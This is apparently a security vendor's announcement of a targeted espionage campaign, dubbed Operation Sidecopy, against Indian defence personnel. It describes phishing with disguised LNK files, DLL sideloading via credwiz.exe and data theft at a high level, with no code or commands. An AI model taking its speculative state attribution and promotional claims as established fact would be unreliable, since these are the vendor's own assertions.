Seqrite has uncovered a new Advanced Persistent Threat (APT) targeting India’s Defence Forces. Dubbed as ‘Operation Sidecopy’, threat actors behind this campaign were found misleading the security community by copying Tactics, Techniques, and Procedures (TTPs) that point at the Sidewinder APT group. However, researchers at Seqrite have discovered strong evidence of ‘Operation Sidecopy’, having potential links with Pakistan backed – Transparent Tribe group. This is a breakthrough discovery making Seqrite the first cybersecurity brand to expose the real identity of these threat actors.
Post revelation, Seqrite alerted the Government authorities to take precautionary measures. Researchers at Seqrite suspect that China could be leveraging Pakistan-based APT groups to barge in and gather intelligence from India that can benefit them in the on-going India-China conflicts. They further warned that these attacks can put intelligence agencies at risk of losing sensitive information which can be leveraged by both the neighbouring countries. This may happen directly via data exfiltration or indirectly via compromising an individual and compelling them to share confidential data.
Active since early 2019, ‘Operation Sidecopy’ has been using infecting vectors like LNK file, template injection, and equation editor vulnerability to target Indian defence forces. For Command & Control, it has been using Contabo GmbH, the most common hosting providers favoured by Transparent Tribe. According to Seqrite researchers, the malicious actors have been continuously developing malware modules and deploying the updated versions after analyzing the victim’s data and environment. Interestingly, these attackers were even keeping track of malware detected by a system’s AV and hence updating them immediately so that there is no trace left for further investigation.
Uncovering the attack
A couple of months ago, Seqrite’s next-generation behavioural detection technology alerted on a few processes running executable HTML files from non-reputed websites. In addition, the researchers noticed that offending processes had interesting names such as “Defence Production Policy 2020.docx.lnk”. When combined, these factors served as the trigger for advance investigation. Upon probing further, Seqrite researchers found that these attacks were targeted at Indian defence units and armed forces’ individuals.
The attack started with the victim receiving LNK files in the form of compressed ZIP/RAR via phishing emails. Since these files appeared to have realistic names and icons as if they are directly coming from the Government of India, the victims are likely to consider them authentic and get tricked into opening them.
Once opened, the malware runs in the system’s memory, and gradually downloads / installs other components, eventually stealing user data and uploading it to attacker-controlled servers. This attack made use of DLL-Sideloading technique (aka Black-White technique). A Microsoft signed a legitimate system process (credwiz.exe) was used to run malware via sideloading technique. After infiltrating the victim’s machine, the malware immediately restarts the victim’s device, to clear initial infection traces.